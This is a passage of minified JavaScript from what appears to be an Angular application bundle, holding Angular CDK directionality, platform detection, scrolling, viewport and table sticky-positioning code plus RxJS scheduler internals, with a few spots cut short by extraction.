0:t.toLowerCase())||"";return"auto"===a&&"undefined"!=typeof navigator&&(null==navigator?void 0:navigator.language)?Whe.test(navigator.language)?"rtl":"ltr":"rtl"===a?"rtl":"ltr"}((e.body?e.body.dir:null)||n||"ltr")}}ngOnDestroy(){this.change.complete()}}return t.\u0275fac=function(e){return new(e||t)(At(Lhe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),R1=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();try{nw="undefined"!=typeof Intl&&Intl.v8BreakIterator}catch(t){nw=!1}let S1,cr=(()=>{class t{constructor(e){this._platformId=e,this.isBrowser=this._platformId?ag(this._platformId):"object"==typeof document&&!!document,this.EDGE=this.isBrowser&&/(edge)/i.test(navigator.userAgent),this.TRIDENT=this.isBrowser&&/(msie|trident)/i.test(navigator.userAgent),this.BLINK=this.isBrowser&&!(!window.chrome&&!nw)&&"undefined"!=typeof CSS&&!this.EDGE&&!this.TRIDENT,this.WEBKIT=this.isBrowser&&/AppleWebKit/i.test(navigator.userAgent)&&!this.BLINK&&!this.EDGE&&!this.TRIDENT,this.IOS=this.isBrowser&&/iPad|iPhone|iPod/.test(navigator.userAgent)&&!("MSStream"in window),this.FIREFOX=this.isBrowser&&/(firefox|minefield)/i.test(navigator.userAgent),this.ANDROID=this.isBrowser&&/android/i.test(navigator.userAgent)&&!this.TRIDENT,this.SAFARI=this.isBrowser&&/safari/i.test(navigator.userAgent)&&this.WEBKIT}}return t.\u0275fac=function(e){return new(e||t)(At(lm))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const yz=["color","button","checkbox","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"];function bz(){if(S1)return S1;if("object"!=typeof document||!document)return S1=new Set(yz),S1;let t=document.createElement("input");return S1=new Set(yz.filter(a=>(t.setAttribute("type",a),t.type===a))),S1}let Ly,p3,_g,ow;function ym(t){return function Vhe(){if(null==Ly&&"undefined"!=typeof window)try{window.addEventListener("test",null,Object.defineProperty({},"passive",{get:()=>Ly=!0}))}finally{Ly=Ly||!1}return Ly}()?t:!!t.capture}function Mz(){if(null==_g){if("object"!=typeof document||!document||"function"!=typeof Element||!Element)return _g=!1,_g;if("scrollBehavior"in document.documentElement.style)_g=!0;else{const t=Element.prototype.scrollTo;_g=!!t&&!/\{\s*\[native code\]\s*\}/.test(t.toString())}}return _g}function zy(){if("object"!=typeof document||!document)return 0;if(null==p3){const t=document.createElement("div"),a=t.style;t.dir="rtl",a.width="1px",a.overflow="auto",a.visibility="hidden",a.pointerEvents="none",a.position="absolute";const e=document.createElement("div"),i=e.style;i.width="2px",i.height="1px",t.appendChild(e),document.body.appendChild(t),p3=0,0===t.scrollLeft&&(t.scrollLeft=1,p3=0===t.scrollLeft?1:2),t.remove()}return p3}function _3(t){if(function Bhe(){if(null==ow){const t="undefined"!=typeof document?document.head:null;ow=!(!t||!t.createShadowRoot&&!t.attachShadow)}return ow}()){const a=t.getRootNode?t.getRootNode():null;if("undefined"!=typeof ShadowRoot&&ShadowRoot&&a instanceof ShadowRoot)return a}return null}function g3(){let t="undefined"!=typeof document&&document?document.activeElement:null;for(;t&&t.shadowRoot;){const a=t.shadowRoot.activeElement;if(a===t)break;t=a}return t}function Id(t){return t.composedPath?t.composedPath()[0]:t.target}function rw(){return"undefined"!=typeof __karma__&&!!__karma__||"undefined"!=typeof jasmine&&!!jasmine||"undefined"!=typeof jest&&!!jest||"undefined"!=typeof Mocha&&!!Mocha}const Hhe=["addListener","removeListener"],Uhe=["addEventListener","removeEventListener"],qhe=["on","off"];function Tc(t,a,e,i){if(ie(e)&&(i=e,e=void 0),i)return Tc(t,a,e).pipe(Q6(i));const[n,r]=function Qhe(t){return ie(t.addEventListener)&&ie(t.removeEventListener)}(t)?Uhe.map(c=>d=>t[c](a,d,e)):function Ghe(t){return ie(t.addListener)&&ie(t.removeListener)}(t)?Hhe.map(vz(t,a)):function jhe(t){return ie(t.on)&&ie(t.off)}(t)?qhe.map(vz(t,a)):[];if(!n&&Gt(t))return Ut(c=>Tc(c,a,e))(pn(t));if(!n)throw new TypeError("Invalid event target");return new G(c=>{const d=(...T)=>c.next(1r(d)})}function vz(t,a){return e=>i=>t[e](a,i)}class $he extends I{constructor(a,e){super()}schedule(a,e=0){return this}}const C3={setInterval(t,a,...e){const{delegate:i}=C3;return null!=i&&i.setInterval?i.setInterval(t,a,...e):setInterval(t,a,...e)},clearInterval(t){const{delegate:a}=C3;return((null==a?void 0:a.clearInterval)||clearInterval)(t)},delegate:void 0};class sw extends $he{constructor(a,e){super(a,e),this.scheduler=a,this.work=e,this.pending=!1}schedule(a,e=0){if(this.closed)return this;this.state=a;const i=this.id,n=this.scheduler;return null!=i&&(this.id=this.recycleAsyncId(n,i,e)),this.pending=!0,this.delay=e,this.id=this.id||this.requestAsyncId(n,this.id,e),this}requestAsyncId(a,e,i=0){return C3.setInterval(a.flush.bind(a,this),i)}recycleAsyncId(a,e,i=0){if(null!=i&&this.delay===i&&!1===this.pending)return e;C3.clearInterval(e)}execute(a,e){if(this.closed)return new Error("executing a cancelled action");this.pending=!1;const i=this._execute(a,e);if(i)return i;!1===this.pending&&null!=this.id&&(this.id=this.recycleAsyncId(this.scheduler,this.id,null))}_execute(a,e){let n,i=!1;try{this.work(a)}catch(r){i=!0,n=r||new Error("Scheduled action threw falsy error")}if(i)return this.unsubscribe(),n}unsubscribe(){if(!this.closed){const{id:a,scheduler:e}=this,{actions:i}=e;this.work=this.state=this.scheduler=null,this.pending=!1,ae(i,this),null!=a&&(this.id=this.recycleAsyncId(e,a,null)),this.delay=null,super.unsubscribe()}}}const Wy={schedule(t){let a=requestAnimationFrame,e=cancelAnimationFrame;const{delegate:i}=Wy;i&&(a=i.requestAnimationFrame,e=i.cancelAnimationFrame);const n=a(r=>{e=void 0,t(r)});return new I(()=>null==e?void 0:e(n))},requestAnimationFrame(...t){const{delegate:a}=Wy;return((null==a?void 0:a.requestAnimationFrame)||requestAnimationFrame)(...t)},cancelAnimationFrame(...t){const{delegate:a}=Wy;return((null==a?void 0:a.cancelAnimationFrame)||cancelAnimationFrame)(...t)},delegate:void 0};class Fy{constructor(a,e=Fy.now){this.schedulerActionCtor=a,this.now=e}schedule(a,e=0,i){return new this.schedulerActionCtor(this,a).schedule(i,e)}}Fy.now=Kx.now;class cw extends Fy{constructor(a,e=Fy.now){super(a,e),this.actions=[],this._active=!1,this._scheduled=void 0}flush(a){const{actions:e}=this;if(this._active)return void e.push(a);let i;this._active=!0;do{if(i=a.execute(a.state,a.delay))break}while(a=e.shift());if(this._active=!1,i){for(;a=e.shift();)a.unsubscribe();throw i}}}const Az=new class Xhe extends cw{flush(a){this._active=!0;const e=this._scheduled;this._scheduled=void 0;const{actions:i}=this;let n;a=a||i.shift();do{if(n=a.execute(a.state,a.delay))break}while((a=i[0])&&a.id===e&&i.shift());if(this._active=!1,n){for(;(a=i[0])&&a.id===e&&i.shift();)a.unsubscribe();throw n}}}(class Khe extends sw{constructor(a,e){super(a,e),this.scheduler=a,this.work=e}requestAsyncId(a,e,i=0){return null!==i&&i>0?super.requestAsyncId(a,e,i):(a.actions.push(this),a._scheduled||(a._scheduled=Wy.requestAnimationFrame(()=>a.flush(void 0))))}recycleAsyncId(a,e,i=0){if(null!=i&&i>0||null==i&&this.delay>0)return super.recycleAsyncId(a,e,i);a.actions.some(n=>n.id===e)||(Wy.cancelAnimationFrame(e),a._scheduled=void 0)}});let lw,Yhe=1;const y3={};function Tz(t){return t in y3&&(delete y3[t],!0)}const Jhe={setImmediate(t){const a=Yhe++;return y3[a]=!0,lw||(lw=Promise.resolve()),lw.then(()=>Tz(a)&&t()),a},clearImmediate(t){Tz(t)}},{setImmediate:Zhe,clearImmediate:efe}=Jhe,b3={setImmediate(...t){const{delegate:a}=b3;return((null==a?void 0:a.setImmediate)||Zhe)(...t)},clearImmediate(t){const{delegate:a}=b3;return((null==a?void 0:a.clearImmediate)||efe)(t)},delegate:void 0},dw=new class ife extends cw{flush(a){this._active=!0;const e=this._scheduled;this._scheduled=void 0;const{actions:i}=this;let n;a=a||i.shift();do{if(n=a.execute(a.state,a.delay))break}while((a=i[0])&&a.id===e&&i.shift());if(this._active=!1,n){for(;(a=i[0])&&a.id===e&&i.shift();)a.unsubscribe();throw n}}}(class tfe extends sw{constructor(a,e){super(a,e),this.scheduler=a,this.work=e}requestAsyncId(a,e,i=0){return null!==i&&i>0?super.requestAsyncId(a,e,i):(a.actions.push(this),a._scheduled||(a._scheduled=b3.setImmediate(a.flush.bind(a,void 0))))}recycleAsyncId(a,e,i=0){if(null!=i&&i>0||null==i&&this.delay>0)return super.recycleAsyncId(a,e,i);a.actions.some(n=>n.id===e)||(b3.clearImmediate(e),a._scheduled=void 0)}}),Vy=new cw(sw),afe=Vy;function M3(t=0,a,e=afe){let i=-1;return null!=a&&(co(a)?e=a:i=a),new G(n=>{let r=function ofe(t){return t instanceof Date&&!isNaN(t)}(t)?+t-e.now():t;r<0&&(r=0);let c=0;return e.schedule(function(){n.closed||(n.next(c++),0<=i?this.schedule(void 0,i):n.complete())},r)})}function mw(t,a=Vy){return function nfe(t){return Ie((a,e)=>{let i=!1,n=null,r=null,c=!1;const d=()=>{if(null==r||r.unsubscribe(),r=null,i){i=!1;const k=n;n=null,e.next(k)}c&&e.complete()},T=()=>{r=null,c&&e.complete()};a.subscribe(Ae(e,k=>{i=!0,n=k,r||pn(t(k)).subscribe(r=Ae(e,d,T))},()=>{c=!0,(!i||!r||r.closed)&&e.complete()}))})}(()=>M3(t,a))}let By=(()=>{class t{constructor(e,i,n){this._ngZone=e,this._platform=i,this._scrolled=new J,this._globalSubscription=null,this._scrolledCount=0,this.scrollContainers=new Map,this._document=n}register(e){this.scrollContainers.has(e)||this.scrollContainers.set(e,e.elementScrolled().subscribe(()=>this._scrolled.next(e)))}deregister(e){const i=this.scrollContainers.get(e);i&&(i.unsubscribe(),this.scrollContainers.delete(e))}scrolled(e=20){return this._platform.isBrowser?new G(i=>{this._globalSubscription||this._addGlobalListener();const n=e>0?this._scrolled.pipe(mw(e)).subscribe(i):this._scrolled.subscribe(i);return this._scrolledCount++,()=>{n.unsubscribe(),this._scrolledCount--,this._scrolledCount||this._removeGlobalListener()}}):Bi()}ngOnDestroy(){this._removeGlobalListener(),this.scrollContainers.forEach((e,i)=>this.deregister(i)),this._scrolled.complete()}ancestorScrolled(e,i){const n=this.getAncestorScrollContainers(e);return this.scrolled(i).pipe(Dn(r=>!r||n.indexOf(r)>-1))}getAncestorScrollContainers(e){const i=[];return this.scrollContainers.forEach((n,r)=>{this._scrollableContainsElement(r,e)&&i.push(r)}),i}_getWindow(){return this._document.defaultView||window}_scrollableContainsElement(e,i){let n=Gr(i),r=e.getElementRef().nativeElement;do{if(n==r)return!0}while(n=n.parentElement);return!1}_addGlobalListener(){this._globalSubscription=this._ngZone.runOutsideAngular(()=>Tc(this._getWindow().document,"scroll").subscribe(()=>this._scrolled.next()))}_removeGlobalListener(){this._globalSubscription&&(this._globalSubscription.unsubscribe(),this._globalSubscription=null)}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(cr),At(ga,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),uw=(()=>{class t{constructor(e,i,n,r){this.elementRef=e,this.scrollDispatcher=i,this.ngZone=n,this.dir=r,this._destroyed=new J,this._elementScrolled=new G(c=>this.ngZone.runOutsideAngular(()=>Tc(this.elementRef.nativeElement,"scroll").pipe(ea(this._destroyed)).subscribe(c)))}ngOnInit(){this.scrollDispatcher.register(this)}ngOnDestroy(){this.scrollDispatcher.deregister(this),this._destroyed.next(),this._destroyed.complete()}elementScrolled(){return this._elementScrolled}getElementRef(){return this.elementRef}scrollTo(e){const i=this.elementRef.nativeElement,n=this.dir&&"rtl"==this.dir.value;null==e.left&&(e.left=n?e.end:e.start),null==e.right&&(e.right=n?e.start:e.end),null!=e.bottom&&(e.top=i.scrollHeight-i.clientHeight-e.bottom),n&&0!=zy()?(null!=e.left&&(e.right=i.scrollWidth-i.clientWidth-e.left),2==zy()?e.left=e.right:1==zy()&&(e.left=e.right?-e.right:e.right)):null!=e.right&&(e.left=i.scrollWidth-i.clientWidth-e.right),this._applyScrollToOptions(e)}_applyScrollToOptions(e){const i=this.elementRef.nativeElement;Mz()?i.scrollTo(e):(null!=e.top&&(i.scrollTop=e.top),null!=e.left&&(i.scrollLeft=e.left))}measureScrollOffset(e){const i="left",n="right",r=this.elementRef.nativeElement;if("top"==e)return r.scrollTop;if("bottom"==e)return r.scrollHeight-r.clientHeight-r.scrollTop;const c=this.dir&&"rtl"==this.dir.value;return"start"==e?e=c?n:i:"end"==e&&(e=c?i:n),c&&2==zy()?e==i?r.scrollWidth-r.clientWidth-r.scrollLeft:r.scrollLeft:c&&1==zy()?e==i?r.scrollLeft+r.scrollWidth-r.clientWidth:-r.scrollLeft:e==i?r.scrollLeft:r.scrollWidth-r.clientWidth-r.scrollLeft}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(By),Ee(qi),Ee(Cr,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-scrollable",""],["","cdkScrollable",""]]}),t})(),bm=(()=>{class t{constructor(e,i,n){this._platform=e,this._change=new J,this._changeListener=r=>{this._change.next(r)},this._document=n,i.runOutsideAngular(()=>{if(e.isBrowser){const r=this._getWindow();r.addEventListener("resize",this._changeListener),r.addEventListener("orientationchange",this._changeListener)}this.change().subscribe(()=>this._viewportSize=null)})}ngOnDestroy(){if(this._platform.isBrowser){const e=this._getWindow();e.removeEventListener("resize",this._changeListener),e.removeEventListener("orientationchange",this._changeListener)}this._change.complete()}getViewportSize(){this._viewportSize||this._updateViewportSize();const e={width:this._viewportSize.width,height:this._viewportSize.height};return this._platform.isBrowser||(this._viewportSize=null),e}getViewportRect(){const e=this.getViewportScrollPosition(),{width:i,height:n}=this.getViewportSize();return{top:e.top,left:e.left,bottom:e.top+n,right:e.left+i,height:n,width:i}}getViewportScrollPosition(){if(!this._platform.isBrowser)return{top:0,left:0};const e=this._document,i=this._getWindow(),n=e.documentElement,r=n.getBoundingClientRect();return{top:-r.top||e.body.scrollTop||i.scrollY||n.scrollTop||0,left:-r.left||e.body.scrollLeft||i.scrollX||n.scrollLeft||0}}change(e=20){return e>0?this._change.pipe(mw(e)):this._change}_getWindow(){return this._document.defaultView||window}_updateViewportSize(){const e=this._getWindow();this._viewportSize=this._platform.isBrowser?{width:e.innerWidth,height:e.innerHeight}:{width:0,height:0}}}return t.\u0275fac=function(e){return new(e||t)(At(cr),At(qi),At(ga,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),uu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})(),Hy=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[R1,uu,R1,uu]}),t})();const cfe=[[["caption"]],[["colgroup"],["col"]]],lfe=["caption","colgroup, col"];function hw(t){return class extends t{constructor(...a){super(...a),this._sticky=!1,this._hasStickyChanged=!1}get sticky(){return this._sticky}set sticky(a){const e=this._sticky;this._sticky=wi(a),this._hasStickyChanged=e!==this._sticky}hasStickyChanged(){const a=this._hasStickyChanged;return this._hasStickyChanged=!1,a}resetStickyChanged(){this._hasStickyChanged=!1}}}const k1=new ni("CDK_TABLE");let P1=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkCellDef",""]]}),t})(),O1=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkHeaderCellDef",""]]}),t})(),v3=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkFooterCellDef",""]]}),t})();class hfe{}const ffe=hw(hfe);let Nh=(()=>{class t extends ffe{constructor(e){super(),this._table=e,this._stickyEnd=!1}get name(){return this._name}set name(e){this._setNameInput(e)}get stickyEnd(){return this._stickyEnd}set stickyEnd(e){const i=this._stickyEnd;this._stickyEnd=wi(e),this._hasStickyChanged=i!==this._stickyEnd}_updateColumnCssClassName(){this._columnCssClassName=[`cdk-column-${this.cssClassFriendlyName}`]}_setNameInput(e){e&&(this._name=e,this.cssClassFriendlyName=e.replace(/[^a-z0-9_-]/gi,"-"),this._updateColumnCssClassName())}}return t.\u0275fac=function(e){return new(e||t)(Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkColumnDef",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,P1,5),fa(n,O1,5),fa(n,v3,5)),2&e){let r;Vt(r=Bt())&&(i.cell=r.first),Vt(r=Bt())&&(i.headerCell=r.first),Vt(r=Bt())&&(i.footerCell=r.first)}},inputs:{sticky:"sticky",name:["cdkColumnDef","name"],stickyEnd:"stickyEnd"},features:[ki([{provide:"MAT_SORT_HEADER_COLUMN_DEF",useExisting:t}]),ci]}),t})();class fw{constructor(a,e){e.nativeElement.classList.add(...a._columnCssClassName)}}let pw=(()=>{class t extends fw{constructor(e,i){super(e,i)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nh),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["cdk-header-cell"],["th","cdk-header-cell",""]],hostAttrs:["role","columnheader",1,"cdk-header-cell"],features:[ci]}),t})(),_w=(()=>{class t extends fw{constructor(e,i){var n;if(super(e,i),1===(null===(n=e._table)||void 0===n?void 0:n._elementRef.nativeElement.nodeType)){const r=e._table._elementRef.nativeElement.getAttribute("role");i.nativeElement.setAttribute("role","grid"===r||"treegrid"===r?"gridcell":"cell")}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nh),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["cdk-cell"],["td","cdk-cell",""]],hostAttrs:[1,"cdk-cell"],features:[ci]}),t})();class Dz{constructor(){this.tasks=[],this.endTasks=[]}}const gw=new ni("_COALESCED_STYLE_SCHEDULER");let xz=(()=>{class t{constructor(e){this._ngZone=e,this._currentSchedule=null,this._destroyed=new J}schedule(e){this._createScheduleIfNeeded(),this._currentSchedule.tasks.push(e)}scheduleEnd(e){this._createScheduleIfNeeded(),this._currentSchedule.endTasks.push(e)}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}_createScheduleIfNeeded(){this._currentSchedule||(this._currentSchedule=new Dz,this._getScheduleObservable().pipe(ea(this._destroyed)).subscribe(()=>{for(;this._currentSchedule.tasks.length||this._currentSchedule.endTasks.length;){const e=this._currentSchedule;this._currentSchedule=new Dz;for(const i of e.tasks)i();for(const i of e.endTasks)i()}this._currentSchedule=null}))}_getScheduleObservable(){return this._ngZone.isStable?Sa(Promise.resolve(void 0)):this._ngZone.onStable.pipe(Cn(1))}}return t.\u0275fac=function(e){return new(e||t)(At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Cw=(()=>{class t{constructor(e,i){this.template=e,this._differs=i}ngOnChanges(e){if(!this._columnsDiffer){const i=e.columns&&e.columns.currentValue||[];this._columnsDiffer=this._differs.find(i).create(),this._columnsDiffer.diff(i)}}getColumnsDiff(){return this._columnsDiffer.diff(this.columns)}extractCellTemplate(e){return this instanceof Uy?e.headerCell.template:this instanceof qy?e.footerCell.template:e.cell.template}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd))},t.\u0275dir=Ot({type:t,features:[sa]}),t})();class pfe extends Cw{}const _fe=hw(pfe);let Uy=(()=>{class t extends _fe{constructor(e,i,n){super(e,i),this._table=n}ngOnChanges(e){super.ngOnChanges(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkHeaderRowDef",""]],inputs:{columns:["cdkHeaderRowDef","columns"],sticky:["cdkHeaderRowDefSticky","sticky"]},features:[ci,sa]}),t})();class gfe extends Cw{}const Cfe=hw(gfe);let qy=(()=>{class t extends Cfe{constructor(e,i,n){super(e,i),this._table=n}ngOnChanges(e){super.ngOnChanges(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkFooterRowDef",""]],inputs:{columns:["cdkFooterRowDef","columns"],sticky:["cdkFooterRowDefSticky","sticky"]},features:[ci,sa]}),t})(),A3=(()=>{class t extends Cw{constructor(e,i,n){super(e,i),this._table=n}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(yd),Ee(k1,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkRowDef",""]],inputs:{columns:["cdkRowDefColumns","columns"],when:["cdkRowDefWhen","when"]},features:[ci]}),t})(),Lh=(()=>{class t{constructor(e){this._viewContainer=e,t.mostRecentCellOutlet=this}ngOnDestroy(){t.mostRecentCellOutlet===this&&(t.mostRecentCellOutlet=null)}}return t.mostRecentCellOutlet=null,t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","cdkCellOutlet",""]]}),t})(),yw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["cdk-header-row"],["tr","cdk-header-row",""]],hostAttrs:["role","row",1,"cdk-header-row"],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),Mw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["cdk-row"],["tr","cdk-row",""]],hostAttrs:["role","row",1,"cdk-row"],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),T3=(()=>{class t{constructor(e){this.templateRef=e,this._contentClassName="cdk-no-data-row"}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","cdkNoDataRow",""]]}),t})();const wz=["top","bottom","left","right"];class yfe{constructor(a,e,i,n,r=!0,c=!0,d){this._isNativeHtmlTable=a,this._stickCellCss=e,this.direction=i,this._coalescedStyleScheduler=n,this._isBrowser=r,this._needsPositionStickyOnElement=c,this._positionListener=d,this._cachedCellWidths=[],this._borderCellCss={top:`${e}-border-elem-top`,bottom:`${e}-border-elem-bottom`,left:`${e}-border-elem-left`,right:`${e}-border-elem-right`}}clearStickyPositioning(a,e){const i=[];for(const n of a)if(n.nodeType===n.ELEMENT_NODE){i.push(n);for(let r=0;r{for(const n of i)this._removeStickyStyle(n,e)})}updateStickyColumns(a,e,i,n=!0){if(!a.length||!this._isBrowser||!e.some(te=>te)&&!i.some(te=>te))return void(this._positionListener&&(this._positionListener.stickyColumnsUpdated({sizes:[]}),this._positionListener.stickyEndColumnsUpdated({sizes:[]})));const r=a[0],c=r.children.length,d=this._getCellWidths(r,n),T=this._getStickyStartColumnPositions(d,e),k=this._getStickyEndColumnPositions(d,i),q=e.lastIndexOf(!0),Y=i.indexOf(!0);this._coalescedStyleScheduler.schedule(()=>{const te="rtl"===this.direction,pe=te?"right":"left",Re=te?"left":"right";for(const Fe of a)for(let Ne=0;Nee[Ne]?Fe:null)}),this._positionListener.stickyEndColumnsUpdated({sizes:-1===Y?[]:d.slice(Y).map((Fe,Ne)=>i[Ne+Y]?Fe:null).reverse()}))})}stickRows(a,e,i){if(!this._isBrowser)return;const n="bottom"===i?a.slice().reverse():a,r="bottom"===i?e.slice().reverse():e,c=[],d=[],T=[];for(let q=0,Y=0;q{var q,Y;for(let te=0;te{e.some(n=>!n)?this._removeStickyStyle(i,["bottom"]):this._addStickyStyle(i,"bottom",0,!1)})}_removeStickyStyle(a,e){for(const n of e)a.style[n]="",a.classList.remove(this._borderCellCss[n]);wz.some(n=>-1===e.indexOf(n)&&a.style[n])?a.style.zIndex=this._getCalculatedZIndex(a):(a.style.zIndex="",this._needsPositionStickyOnElement&&(a.style.position=""),a.classList.remove(this._stickCellCss))}_addStickyStyle(a,e,i,n){a.classList.add(this._stickCellCss),n&&a.classList.add(this._borderCellCss[e]),a.style[e]=`${i}px`,a.style.zIndex=this._getCalculatedZIndex(a),this._needsPositionStickyOnElement&&(a.style.cssText+="position: -webkit-sticky; position: sticky; ")}_getCalculatedZIndex(a){const e={top:100,bottom:10,left:1,right:1};let i=0;for(const n of wz)a.style[n]&&(i+=e[n]);return i?`${i}`:""}_getCellWidths(a,e=!0){if(!e&&this._cachedCellWidths.length)return this._cachedCellWidths;const i=[],n=a.children;for(let r=0;r0;r--)e[r]&&(i[r]=n,n+=a[r]);return i}}const vw=new ni("CDK_SPL");let E3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","rowOutlet",""]]}),t})(),D3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","headerRowOutlet",""]]}),t})(),x3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","footerRowOutlet",""]]}),t})(),w3=(()=>{class t{constructor(e,i){this.viewContainer=e,this.elementRef=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","noDataRowOutlet",""]]}),t})(),I3=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this._differs=e,this._changeDetectorRef=i,this._elementRef=n,this._dir=c,this._platform=T,this._viewRepeater=k,this._coalescedStyleScheduler=q,this._viewportRuler=Y,this._stickyPositioningListener=te,this._ngZone=pe,this._onDestroy=new J,this._columnDefsByName=new Map,this._customColumnDefs=new Set,this._customRowDefs=new Set,this._customHeaderRowDefs=new Set,this._customFooterRowDefs=new Set,this._headerRowDefChanged=!0,this._footerRowDefChanged=!0,this._stickyColumnStylesNeedReset=!0,this._forceRecalculateCellWidths=!0,this._cachedRenderRowsMap=new Map,this.stickyCssClass="cdk-table-sticky",this.needsPositionStickyOnElement=!0,this._isShowingNoDataRow=!1,this._multiTemplateDataRows=!1,this._fixedLayout=!1,this.contentChanged=new Tt,this.viewChange=new zs({start:0,end:Number.MAX_VALUE}),r||this._elementRef.nativeElement.setAttribute("role","table"),this._document=d,this._isNativeHtmlTable="TABLE"===this._elementRef.nativeElement.nodeName}get trackBy(){return this._trackByFn}set trackBy(e){this._trackByFn=e}get dataSource(){return this._dataSource}set dataSource(e){this._dataSource!==e&&this._switchDataSource(e)}get multiTemplateDataRows(){return this._multiTemplateDataRows}set multiTemplateDataRows(e){this._multiTemplateDataRows=wi(e),this._rowOutlet&&this._rowOutlet.viewContainer.length&&(this._forceRenderDataRows(),this.updateStickyColumnStyles())}get fixedLayout(){return this._fixedLayout}set fixedLayout(e){this._fixedLayout=wi(e),this._forceRecalculateCellWidths=!0,this._stickyColumnStylesNeedReset=!0}ngOnInit(){this._setupStickyStyler(),this._isNativeHtmlTable&&this._applyNativeTableSections(),this._dataDiffer=this._differs.find([]).create((e,i)=>this.trackBy?this.trackBy(i.dataIndex,i.data):i),this._viewportRuler.change().pipe(ea(this._onDestroy)).subscribe(()=>{this._forceRecalculateCellWidths=!0})}ngAfterContentChecked(){this._cacheRowDefs(),this._cacheColumnDefs();const i=this._renderUpdatedColumns()||this._headerRowDefChanged||this._footerRowDefChanged;this._stickyColumnStylesNeedReset=this._stickyColumnStylesNeedReset||i,this._forceRecalculateCellWidths=i,this._headerRowDefChanged&&(this._forceRenderHeaderRows(),this._headerRowDefChanged=!1),this._footerRowDefChanged&&(this._forceRenderFooterRows(),this._footerRowDefChanged=!1),this.dataSource&&this._rowDefs.length>0&&!this._renderChangeSubscription?this._observeRenderChanges():this._stickyColumnStylesNeedReset&&this.updateStickyColumnStyles(),this._checkStickyStates()}ngOnDestroy(){[this._rowOutlet.viewContainer,this._headerRowOutlet.viewContainer,this._footerRowOutlet.viewContainer,this._cachedRenderRowsMap,this._customColumnDefs,this._customRowDefs,this._customHeaderRowDefs,this._customFooterRowDefs,this._columnDefsByName].forEach(e=>{e.clear()}),this._headerRowDefs=[],this._footerRowDefs=[],this._defaultRowDef=null,this._onDestroy.next(),this._onDestroy.complete(),f3(this.dataSource)&&this.dataSource.disconnect(this)}renderRows(){this._renderRows=this._getAllRenderRows();const e=this._dataDiffer.diff(this._renderRows);if(!e)return this._updateNoDataRow(),void this.contentChanged.next();const 